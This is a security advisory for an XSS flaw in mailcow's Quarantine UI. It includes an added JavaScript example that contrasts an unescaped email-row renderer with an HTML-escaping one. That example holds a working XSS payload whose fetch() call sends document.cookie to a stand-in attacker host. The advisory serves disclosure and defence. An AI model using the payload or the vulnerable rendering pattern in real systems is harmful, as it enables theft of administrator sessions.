
CVE-2023-49077: XSS Vulnerability in Quarantine UI Allows Unauthorized Access and Data Manipulation

mailcow: dockerized is an open source groupware/email suite based on Docker. A Cross-Site Scripting (XSS) vulnerability has been identified within its Quarantine UI. The vulnerability poses a significant threat to administrators who use the Quarantine feature: an attacker can send a carefully crafted email containing malicious JavaScript code, which is executed when the message is opened or previewed in the Quarantine UI. This issue has been patched in version 2023-11.


Impact

A Cross-Site Scripting (XSS) vulnerability has been identified within the Quarantine UI of the system. This vulnerability poses a significant threat to administrators who use the Quarantine feature, as it allows a remote, unauthenticated sender to execute arbitrary JavaScript in the context of the administrator's browser session.

Exploitation requires no interaction beyond normal use of the feature: the attacker sends a carefully crafted email containing malicious JavaScript code, and when an administrator opens or previews that message within the Quarantine UI, the injected code is executed with the privileges of the administrator's session. The script can read anything the administrator can read and issue any request the administrator could issue, which can lead to unauthorized access, data manipulation, or the initiation of further attacks within the system.
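The pattern behind this class of bug, shown as an added illustrative example that is not mailcow's code: a quarantine listing that interpolates an attacker-controlled Subject header straight into HTML, beside a hardened version that HTML-encodes every untrusted field before interpolation. The record shape, the field names, the function names and the payload are constructed assumptions for the example.

```javascript
// Added illustrative example, not mailcow's code. The record shape, field
// names and payload below are constructed for the demonstration.

// A constructed quarantine record as an attacker can cause it to appear:
// the Subject header carries an HTML/JS payload. Nothing in SMTP stops a
// sender from putting arbitrary bytes in a header.
const CONSTRUCTED_ITEM = {
  id: 42,
  sender: "attacker@example.net",
  subject:
    '<img src=x onerror="fetch(\'https://attacker.example/steal?c=\'+document.cookie)">',
  score: 12.5,
};

// Vulnerable pattern: raw mail fields are concatenated into markup. Whatever
// the sender put in Subject becomes live HTML the moment this string is
// assigned to innerHTML or emitted by a template helper with escaping off.
function renderRowVulnerable(item) {
  return `<tr><td>${item.id}</td><td>${item.sender}</td><td>${item.subject}</td></tr>`;
}

// Hardened pattern: encode the five HTML-significant characters in every
// untrusted value, so the browser renders the payload as text, not markup.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

function renderRowSafe(item) {
  return `<tr><td>${escapeHtml(item.id)}</td><td>${escapeHtml(item.sender)}</td><td>${escapeHtml(item.subject)}</td></tr>`;
}

// Check used to compare the two renderers: does the output still contain an
// element tag that originated in the untrusted Subject? The table's own
// <tr>/<td> tags are legitimate, so only the injected tag names are tested.
function containsInjectedTag(html) {
  return /<(img|script|svg|iframe)\b/i.test(html);
}

// Usage
console.log(renderRowVulnerable(CONSTRUCTED_ITEM)); // payload survives intact
console.log(renderRowSafe(CONSTRUCTED_ITEM)); // payload shown as inert text
```

In browser code the better fix is to avoid building HTML strings at all: create the cells with `document.createElement` and assign the mail fields to `textContent`, which can never be parsed as markup. Output encoding must be applied to every field that originates from the message (sender, recipient, subject, attachment names), not just the one a report happens to mention, and a Content-Security-Policy without `unsafe-inline` limits the damage if a field is missed.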

Patches

Fixed in version 2023-11; upgrade to 2023-11 or later.

Workarounds

Until the upgrade is applied, disable the Quarantine feature under System -> Configuration -> Options -> Quarantine, so that no attacker-supplied message is rendered in the Quarantine UI.
